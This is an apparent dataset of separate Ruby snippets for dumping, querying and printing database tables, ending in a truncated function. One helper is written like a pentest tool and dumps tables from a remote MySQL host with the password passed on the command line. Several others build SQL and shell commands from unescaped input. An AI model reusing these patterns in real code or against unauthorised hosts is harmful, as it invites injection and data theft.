"def dump_table(io, table_obj)\n create_data = table_obj.data.clone\n create_data.delete(:name)\n create_data[:return_sql] = true\n\n # Get SQL for creating table and add it to IO.\n sqls = @export_db.tables.create(table_obj.name, **create_data)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n\n\n # Try to find a primary column in the table.\n prim_col = nil\n table_obj.columns do |col|\n if col.primarykey?\n prim_col = col\n break\n end\n end\n\n\n debug \"Dumping data for table: #{table_obj.name}\"\n\n # Set up rows and way to fill rows.\n rows = []\n\n\n @db.select(table_obj.name, nil, unbuffered: true) do |row|\n rows << row\n @rows_count += 1\n\n if rows.length >= 1000\n update_status\n dump_insert_multi(io, table_obj, rows)\n end\n end\n\n\n # Dump the last rows if any.\n dump_insert_multi(io, table_obj, rows) unless rows.empty?\n end",
"def writeTable(outf, db)\n fieldNames = db.fields\n rows = db.data\n \n #outf.puts(\"*** Field Names (#{fieldNames.length}) *** \\n\", fieldNames, \"\\n\") # debug\n #outf.puts(\"*** Records *** \\n\", rows) # debug\n outf.puts(rows)\nend",
"def capture_table(table)\n return 'none' if table.size == 1 # the first row is for column titles\n $stdout = StringIO.new # start capturing the output\n print_table(table.map{ |row| row.map(&:to_s) })\n output = $stdout\n $stdout = STDOUT # restore normal output\n return output.string\n end",
"def db_to_stdout(src)\n pool = Connections.init_pool src\n query_stream = QueryStream.new pool\n stdout_writer = STDOUTWriter.new\n\n Pipe.new from: query_stream, to: stdout_writer\n end",
"def sql! sql=nil\n require 'niceql'\n puts Niceql::Prettifier.prettify_sql sql || $last_sql_command\n end",
"def dumpDataTables\n print \" ------ users\" + Array.new(34).join('-') + \" \" + Array.new(21).join('-')\n $conn.exec(\"SELECT * FROM users order by id\") do |result|\n result.each do |row|\n print \"\\n %6d %-33s \" % row.values_at('id', 'email')\n end\n end\n print \"\\n ------ contents\" + Array.new(50).join('-')\n $conn.exec(\"SELECT * FROM contents order by id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('id', 'text')\n end\n end\n print \"\\n ------ user_responses SHARE\" + Array.new(50).join('-')\n $conn.exec(\"select user_id, string_agg(concat(content_id), ',') from user_responses where response = TRUE group by user_id order by user_id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('user_id', 'string_agg')\n end\n end\n print \"\\n ------ user_responses KILL\" + Array.new(50).join('-')\n $conn.exec(\"select user_id, string_agg(concat(content_id), ',') from user_responses where response = FALSE group by user_id order by user_id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('user_id', 'string_agg')\n end\n end\n print \"\\n ------ user_responses IGNORE\" + Array.new(50).join('-')\n $conn.exec(\"select user_id, string_agg(concat(content_id), ',') from user_responses where response ISNULL group by user_id order by user_id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('user_id', 'string_agg')\n end\n end\nend",
"def tabulate content, options\n data = []\n content.each {|line| data << line.join(\"\\t\"); }\n puts \"Rows: #{data.size}\" if $opt_verbose\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n #filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n if options[:formatting]\n system(\"term-table.rb < #{filename} | sponge #{filename}\")\n end\n return filename\nend",
"def view_table(db, table)\n db.execute(\"SELECT * FROM #{table}\")\nend",
"def print_query(sql)\n IRB::Pager.pager {\n query(sql) do |l|\n puts l\n end\n }\n end",
"def showTable(db, flag)\n fieldNames = db.fields \n rows = db.data\n \n case(flag)\n when \"f\" then puts(\"*** Field Names #{fieldNames.length} *** \\n\", fieldNames, \"\\n\")\n when \"r\" then puts(\"*** Records *** \\n\", rows)\n when \"p\" then print(\"*** Records *** \\n\", rows) #debug\n end\nend",
"def big_table\n # suppress_output\n # header title: 'Monkey Butt the wide, and annoying', width: 80, align: 'left', rule: false, color: 'blue', bold: false, timestamp: false\n table border: true do\n row color: 'blue' do\n column 'Player', width: 20, align: 'left', color: 'green'\n column 'Overall % correct', width: 30, align: 'left', color: 'green'\n end\n User.all.each do |user|\n row color: 'blue' do\n # binding.pry\n column \"#{user.name}\", width: 20, align: 'left', color: 'green'\n column \"#{user.total_average}%\", width: 20, align: 'left', color: 'green'\n end\n end\n # column 'ADDRESS', width: 30, padding: 5\n # column 'CITY', width: 15\n # end\n # row color: 'green', bold: true do\n # column 'caeser'\n # column '1 Appian Way'\n # column 'Rome'\n # end\n # row do\n # column 'Richard Feynman'\n # column '1 Golden Gate'\n # column 'Quantum Field'\n end\n\n # return capture_output\n end",
"def sql sql\n @master.puts \"#{sql};\"\n end",
"def put_table(table)\n table.each {|row| puts row.join(' ') }\nend",
"def table_bloat\n data = select(<<-SQL, \"Table Bloat\")\n SELECT tablename AS table_name\n , reltuples::bigint AS rows\n , relpages::bigint AS pages\n , otta\n , ROUND(CASE WHEN otta = 0 OR sml.relpages = 0 OR sml.relpages = otta THEN 0.0\n ELSE sml.relpages / otta::numeric END, 1) AS percent_bloat\n , CASE WHEN relpages < otta THEN 0\n ELSE relpages::bigint - otta END AS wasted_pages\n , CASE WHEN relpages < otta THEN 0\n ELSE (blocksize * (relpages - otta))::bigint END AS wasted_size\n , CASE WHEN relpages < otta THEN 0\n ELSE blocksize * (sml.relpages - otta)::bigint END AS wasted_bytes\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr%pagesize = 0 THEN pagesize\n ELSE datahdr%pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (CASE WHEN hdr%pagesize = 0 THEN pagesize\n ELSE hdr%pagesize END)))::numeric\n AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (CASE WHEN nullhdr%pagesize = 0 THEN pagesize\n ELSE nullhdr%pagesize END)))\n AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n ( SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2)\n FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8\n ELSE 4 END AS pagesize\n FROM ( SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname AND nn.nspname <> 'information_schema'\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def table; end",
"def table; end",
"def table; end",
"def table; end",
"def dump(io)\n print \"Going through tables.\\n\" if @debug\n @rows_count = 0\n \n if @args[:tables]\n tables = @args[:tables]\n else\n tables = @args[:db].tables.list.values\n end\n \n if @on_status\n @on_status.call(:text => \"Preparing.\")\n \n @rows_count_total = 0\n tables.each do |table_obj|\n @rows_count_total += table_obj.rows_count\n end\n end\n \n tables.each do |table_obj|\n table_obj = @args[:db].tables[table_obj] if table_obj.is_a?(String) or table_obj.is_a?(Symbol)\n \n #Figure out keys.\n @keys = []\n table_obj.columns do |col|\n @keys << col.name\n end\n \n @table_obj = table_obj\n self.update_status\n print \"Dumping table: '#{table_obj.name}'.\\n\" if @debug\n self.dump_table(io, table_obj)\n end\n end",
"def paginated_dump( &encode_block )\n records_count = 0\n table_dataset.order(*primary_keys).each_page(page_size) do |page|\n logger.info \"#{__method__} #{table_name} #{records_count}\"\n logger.debug page.sql\n page.each &encode_block\n records_count += page_size\n end\n end",
"def print_stats_table()\n res = @db.query(\"SELECT * FROM UserStats;\")\n while row = res.fetch_row do\n printf \"%s %s\\n\", row[0], row[1], row[2], row[3]\n end\n end",
"def all_records(table_name)\n @connection.execute(\"Select #{columns_minus_geom(table_name).collect { |c| \"\\\"#{c}\\\"\" }.join(\", \")} from #{table_name}\")\n end",
"def show_table\n DATABASE.execute(\"SELECT * FROM split_checks;\")\nend",
"def tabulate2 content, options\n widths = calculate_column_widths(content, 99)\n str = \"| \"\n sep = \"+\"\n widths.each do |w|\n str << \"%-#{w}s | \"\n sep << (\"-\"*(w+2)) + \"+\"\n end\n data = []\n data << sep \n content.each_with_index {|line, ix| \n data << str % line \n data << sep if ix == 0\n }\n data << sep\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n #filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n return filename\nend",
"def inner_dump( &encode_block )\n # could possibly overrride Dataset#paginate(page_no, page_size, record_count=nil)\n on_conditions = primary_keys.map{|f| [f,f]}.to_h\n (0..table_dataset.count).step(page_size).each do |offset|\n limit_dataset = table_dataset.select( *primary_keys ).limit( page_size, offset ).order( *primary_keys )\n page = table_dataset.join( limit_dataset, on_conditions ).order( *primary_keys ).qualify(table_name)\n logger.info \"#{__method__} #{table_name} #{offset}\"\n logger.debug page.sql\n page.each &encode_block\n end\n end",
"def create_rows_and_query(number_rows, number_query, str_length)\n File.open(\"../benchmark/benchmark_#{number_query}_queries.sql\", 'a+') do |file|\n CSV.open(\"./#{number_rows}_rows_data.csv\", 'a+') do |csv|\n number_rows.times do |time|\n random_str1 = random_str(str_length)\n csv << [time + 1, random_str1]\n file.write(\"select * from test_data where random_str = '#{random_str1}';\") if time < number_query\n end\n end\n end\n puts \"CREATE #{number_rows} ROWS DONE\"\nend",
"def insert_data(output, db, table)\n result = query(db, \"SELECT * FROM #{table}\", \"hash\")\n changes = false\n result.each do |row|\n to_insert(output, table, row)\n changes = true\n end\n output << \"\\n\" if changes\n end",
"def direct_export(file_name, sql = nil, col_sep = \"\\t\")\n sql = self.select(column_names).to_sql if sql.blank?\n data = streaming_query(sql)\n return 0 if data.nil?\n\n write_to_csv(file_name, data, col_sep) {|rec| rec.values }\n end",
"def run\n tables.each do |table|\n dump_table(table)\n end\n end",
"def esc_table(str)\r\n self.conn_exec do |driver|\r\n return driver.esc_table(str)\r\n end\r\n end",
"def print_table_names\r\n get_tables.each do |name| \r\n print \"#{name} \"\r\n end\r\n puts \"\"\r\n end",
"def format table, keys, values\n <<-SQL\nCOPY #{table} (#{keys.join(', ')}) FROM stdin;\n#{values.collect { |row| row.join \"\\t\" }.join \"\\n\"}\n\\\\.\n SQL\n end",
"def table_options_sql(options)\n\t sql = []\n\t sql << flag_option_sql(options, :parallel)\n\t sql << flag_option_sql(options, :logging)\n\t sql << flag_option_sql(options, :monitoring)\n\t sql << \"TABLESPACE #{quote_identifier(options[:tablespace])}\" if options[:tablespace]\n\t sql << compress_option_sql(options)\n\t sql << options[:options] if String === options[:options]\n\t sql.compact.join ' '\n\t end",
"def log_query(sql)\n pad = ' '\n puts Paint[pad + sql, :cyan, :bold]\n # @loggers[0]&.debug(' ' + sql)\n end",
"def report_table(output, sort, options = {}, &block)\n output.puts\n\n top_categories = output.slice_results(sorted_by(sort))\n output.with_style(:top_line => true) do \n output.table(*statistics_header(:title => options[:title],:highlight => sort)) do |rows|\n top_categories.each { |(cat, info)| rows.push(statistics_row(cat)) }\n end\n end\n output.puts\n end",
"def dump_table(db, tbl, num)\n t = Time.now\n timez = t.strftime(\"%m.%d.%Y\")\n logs = RESULTS + @host\n logdir = logs + '/dumps/'\n Dir.mkdir(logs) unless File.exists?(logs)\n Dir.mkdir(logdir) unless File.exists?(logdir)\n print_status(\"Attempting to dump #{db}.#{tbl}....\")\n if num.to_i == 1\n system(\"`which mysqldump` --host=#{@host} --user=#{@user} --password=#{@pass} #{db} #{tbl} --add-locks --create-options --disable-keys --extended-insert --lock-tables --quick -C --dump-date | gzip -c > #{logdir}#{db}_#{tbl}_#{timez}.sql.gz\")\n print_good(\"Table Dump Complete!\")\n print_good(\"You can view it here: #{logdir}#{db}_#{tbl}_#{timez}.sql.gz\")\n else\n system(\"`which mysqldump` --host=#{@host} --user=#{@user} --password=#{@pass} #{db} #{tbl} --add-locks --create-options --disable-keys --extended-insert --lock-tables --quick -C --dump-date > #{logdir}#{db}_#{tbl}_#{timez}.sql\")\n print_good(\"Table Dump Complete!\")\n print_good(\"You can view it here: #{logdir}#{db}_#{tbl}_#{timez}.sql\")\n end\n end",
"def table(header, values, io = $stdout)\n self.puts(io, MiGA.tabulate(header, values, self[:tabular]))\n end",
"def _dump_tables(opts)\n if opts[:schema]\n _literal_table_sort(tables(opts.merge(:qualify=>true)))\n else\n tables(opts).sort\n end\n end",
"def write_sql model_name, model_attributes,output\n model_attributes.each do|key,query|\n sql= ActiveRecord::Base.connection();\n (sql.select_all query).each do |row|\n make_triples(row,model_name,\"\")\n end\n end\n end",
"def display_students_db\n all_students = @conn.exec(\"SELECT * FROM students_db;\")\n #usp[e exec to pretty much do everything\n all_students.each do |student|\n student.each do |k,v|\n puts \"#{k}: #{v}\"\n puts all_students\n end\n end\nend",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def dump(io)\n debug \"Going through tables.\"\n @rows_count = 0\n\n if @on_status\n @on_status.call(text: \"Preparing.\")\n\n @rows_count_total = 0\n tables.each do |table_obj|\n @rows_count_total += table_obj.rows_count\n end\n end\n\n each_table do |table_obj|\n # Figure out keys.\n @keys = []\n table_obj.columns do |col|\n @keys << col.name\n end\n\n @table_obj = table_obj\n update_status\n debug \"Dumping table: '#{table_obj.name}'.\"\n dump_table(io, table_obj)\n end\n\n dump_foreign_keys(io)\n end",
"def output_table(title = '', headings, rows)\n table = Terminal::Table.new\n table.title = title unless title.empty?\n table.rows = rows\n table.headings = headings\n table.style = {\n :padding_left => 1,\n :padding_right => 1\n }\n\n puts table\n end",
"def run_sql(limit: 100, cmds: $sql_commands, print: true, label: 'SELECT Results', collapsed: false, &block)\n Display.status(\"Running sql commands...\")\n cmds = [cmds] if cmds.is_a? String\n results = cmds.map do |cmd|\n dataset = run_cmd(cmd) || []\n if dataset.count > 0\n\n lbl = label\n lbl += \" (Top #{limit} of #{dataset.count})\" if dataset.count > limit\n lbl = \"-\" + lbl if collapsed\n\n block.call(dataset, lbl) if block\n\n Display.table(dataset.to_a.take(limit), label: lbl, allow_preview: true) if print\n end\n dataset\n end\n\n results.select! {|r| r.count > 0 }\n\n if results.length > 1\n $sql_multi = true\n $sql_results = results\n else\n $sql_multi = false\n $sql_results = results.first || []\n end\n\nrescue Sequel::DatabaseError => ex\n msg = ex.message.gsub(\"SQLite3::SQLException: \", \"\");\n puts Display.print(\"ERROR\", \"There was an error with the SQL query:\\n\\n#{msg.strip}\")\n []\nend",
"def inspect\n to_table.render :ascii\n end",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def copy_into_sql(table, opts)\n sql = String.new\n sql << \"COPY #{literal(table)}\"\n if cols = opts[:columns]\n sql << literal(Array(cols))\n end\n sql << \" FROM STDIN\"\n if opts[:options] || opts[:format]\n sql << \" (\"\n sql << \"FORMAT #{opts[:format]}\" if opts[:format]\n sql << \"#{', ' if opts[:format]}#{opts[:options]}\" if opts[:options]\n sql << ')'\n end\n sql\n end",
"def dump_table(table)\n conditions = conditions_for(table)\n\n cmd = \"mysqldump #{ mysql_options } --tables #{ table }\"\n cmd += \" \\\"--where=#{ conditions }\\\"\" if conditions.present?\n\n if post_dump_command\n cmd += \"| #{post_dump_command}\"\n end\n\n cmd += \" > #{ output_dir }/#{ table }#{file_extension}\"\n\n system(cmd)\n end",
"def table_close(opts)\n output = \"\\\\begin{table}\\n\"\n output << \" \\\\centering\\n\"\n output << \" \\\\begin{tabular}{ #{\"l \" * @table[0].size }}\\n\"\n @table.each do |row|\n output << \" #{row.join(\" & \")} \\\\\\\\\\n\"\n end\n output << \" \\\\end{tabular}\\n\"\n output << \"\\\\end{table}\\n\"\n output\n end",
"def to_sql\n source.select(bin_sql).to_sql\n end",
"def database_bloat\n data = select(<<-SQL, \"Database Bloat\")\n SELECT tablename AS table_name\n , ' ' AS index_name\n , reltuples::bigint AS rows\n , relpages::bigint AS pages\n , otta\n , ROUND(CASE WHEN otta = 0 OR sml.relpages = 0 OR sml.relpages = otta THEN 0.0 ELSE sml.relpages / otta::numeric END, 1) AS percent_bloat\n , CASE WHEN relpages < otta THEN 0 ELSE relpages::bigint - otta END AS wasted_pages\n , CASE WHEN relpages < otta THEN 0 ELSE (blocksize * (relpages - otta))::bigint END AS wasted_size\n , CASE WHEN relpages < otta THEN 0 ELSE blocksize * (sml.relpages - otta)::bigint END AS wasted_bytes\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr % pagesize = 0 THEN pagesize\n ELSE datahdr % pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (CASE WHEN hdr%pagesize = 0 THEN pagesize\n ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (CASE WHEN nullhdr % pagesize = 0 THEN pagesize\n ELSE nullhdr % pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n ( SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM ( SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname\n AND nn.nspname <> 'information_schema'\n ) AS sml\n WHERE schemaname = 'public'\n\n UNION\n\n SELECT tablename AS table_name\n , iname AS index_name\n , ituples::bigint AS rows\n , ipages::bigint AS pages\n , iotta AS otta\n , ROUND(CASE WHEN iotta = 0 OR ipages = 0 OR ipages = iotta THEN 0.0 ELSE ipages / iotta::numeric END, 1) AS percent_bloat\n , CASE WHEN ipages < iotta THEN 0 ELSE ipages::bigint - iotta END AS wasted_pages\n , CASE WHEN ipages < iotta THEN 0 ELSE (blocksize * (ipages - iotta))::bigint END AS wasted_size\n , CASE WHEN ipages < iotta THEN 0 ELSE blocksize * (ipages - iotta) END AS wasted_bytes\n\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr % pagesize = 0 THEN pagesize\n ELSE datahdr % pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n , COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples, 0) AS ituples, COALESCE(c2.relpages, 0) AS ipages\n , COALESCE(CEIL((c2.reltuples * (datahdr - 12)) / (blocksize - 20::float)), 0) AS iotta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - ( CASE WHEN hdr%pagesize = 0 THEN pagesize\n ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - ( CASE WHEN nullhdr % pagesize = 0 THEN pagesize\n ELSE nullhdr % pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , 
pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n ( SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM ( SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname\n AND nn.nspname <> 'information_schema'\n LEFT JOIN pg_index i\n ON indrelid = cc.oid\n LEFT JOIN pg_class c2\n ON c2.oid = i.indexrelid\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1, 2\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def print_list(db, table_name)\n\tputs \"Your current to do list:\"\n\ttasks = db.execute(\"SELECT * FROM #{table_name}\")\n\ttasks.each do |task|\n\t\tputs \"Task: #{task['id']} is #{task['task_name']} and will take #{task['task_time']} hours. It is #{task['importance']}/10 important.\"\n\t\tputs\n\tend\nend",
"def dump(vt, to: $stderr)\n to.puts \" .\" + ('-' * (vt.cols)) + \".\"\n (1 .. vt.rows).each do |row|\n to.puts \" |#{vt.row_plaintext(row)}|\"\n end\n to.puts \" '\" + ('-' * (vt.cols)) + \"'\"\nend",
"def index_bloat\n data = select(<<-SQL, \"Index Bloat\")\n SELECT tablename AS table_name\n , iname AS index_name\n , ituples::bigint AS rows\n , ipages::bigint AS pages\n , iotta AS otta\n , ROUND(CASE WHEN iotta = 0 OR ipages = 0 OR ipages = iotta THEN 0.0 ELSE ipages / iotta::numeric END, 1) AS percent_bloat\n , CASE WHEN ipages < iotta THEN 0 ELSE ipages::bigint - iotta END AS wasted_pages\n , CASE WHEN ipages < iotta THEN 0 ELSE (blocksize * (ipages - iotta))::bigint END AS wasted_size\n , CASE WHEN ipages < iotta THEN 0 ELSE blocksize * (ipages - iotta) END AS wasted_bytes\n\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr%pagesize = 0 THEN pagesize\n ELSE datahdr%pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n , COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples, 0) AS ituples, COALESCE(c2.relpages, 0) AS ipages\n , COALESCE(CEIL((c2.reltuples * (datahdr - 12)) / (blocksize - 20::float)), 0) AS iotta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (case when hdr%pagesize = 0 THEN pagesize ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (case when nullhdr%pagesize = 0 THEN pagesize ELSE nullhdr%pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n (SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM (SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname AND nn.nspname <> 'information_schema'\n LEFT JOIN pg_index i\n ON indrelid = cc.oid\n LEFT JOIN pg_class c2\n ON c2.oid = i.indexrelid\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1, 2\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def table\n end",
"def emit record\n puts record.to_flat.join(\"\\t\")\n end",
"def generate_index tab_name, argv\n\t\tquery = \" CREATE INDEX #{argv[argv.keys[0]]} ON #{tab_name} (#{argv[argv.keys[1]]}) \"\n\t\tputs query\n\t\treturn query\n\tend",
"def dumpCsvSpeed()\n CSV.open(csvFilenameSpeed(), \"w\", { :col_sep => csvColSepChar() }) { |csv|\n csv << AnalyzerExpA.genCsvTitleRow() ;\n genCsvSpeed().each{|row|\n csv << row ;\n }\n }\n end",
"def table_open(opts)\n @table = []\n @table_multirow = {}\n @table_multirow_next = {}\n return \"\"\n end",
"def dump_insert_multi(io, table_obj, rows)\n print \"Inserting #{rows.length} into #{table_obj.name}.\\n\" if @debug\n sqls = @args[:db].insert_multi(table_obj.name, rows, :return_sql => true, :keys => @keys)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n rows.clear\n \n #Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def exec_query(query, conn = ActiveRecord::Base.connection)\n res = conn.exec_query(query)\n puts res.rows.map { |r| r.map(&:inspect).join(\",\") }.join('\\n')\n res.to_a\nend",
"def pp_table(headers, rows)\n if headers.empty? || rows.empty?\n return\n end\n puts headers.map { |h| \"%20s\" % h.upcase }.join\n rows.map { |cols| puts cols.map { |c| \"%20s\" % c }.join }\n #puts \"=\" * 80\nend",
"def emit(s, out: $output)\n out.print(TAB, s)\nend",
"def emit(s, out: $output)\n out.print(TAB, s)\nend",
"def emit(s, out: $output)\n out.print(TAB, s)\nend",
"def dumptable\n print <<-TABLEDATA.unindent\n <table>\n <tr><td>userid</td><td>#{@user_id}</td></tr>\n <tr><td>username</td><td>#{@user_name}</td></tr>\n <tr><td>useremail</td><td>#{@user_email}</td></tr>\n <tr><td>visitcount</td><td>#{@visitcount}</td></tr>\n <tr><td>admin</td><td>#{@admin}</td></tr>\n </table>\n TABLEDATA\n end",
"def create_stats_tbl\n tblName = \"#{@table}_stat\"\n creationQuery = \"select ''::text as key, ''::text as value from t_result where 1 =2\"\n # puts creationQuery\n DBConn.tblCreation(tblName, 'key', creationQuery)\n\n parseTree = @parseTree\n\n # fromPT = parseTree['SELECT']['fromClause']\n originalTargeList = parseTree['SELECT']['targetList']\n # fields = DBConn.getAllRelFieldList(fromPT)\n keyList = []\n valueList = []\n selectList = []\n pkJoinList = []\n \n pkArray = @pkList.split(',').map { |col| col.delete(' ') }\n pkArray.each do |pkcol|\n originalTargeList.each do |targetCol|\n targetField = targetCol['RESTARGET']['val']['COLUMNREF']['fields']\n if targetField.count > 1 && targetField[1].to_s == pkcol\n pkJoinList << \"t.#{pkcol} = #{targetField[0]}.#{targetField[1]}\"\n pkArray.delete(pkcol)\n end\n end\n end\n\n stats = {\n \"min\": {\"func\": \"min($COLUMN)\", \"type\": \"text\" },\n \"max\": {\"func\": \"max($COLUMN)\", \"type\": \"text\" },\n \"count\": {\"func\": \"count($COLUMN)\", \"type\": \"int\" },\n \"dist_count\": {\"func\": \"count(distinct $COLUMN)\", \"type\": \"int\" }\n }\n 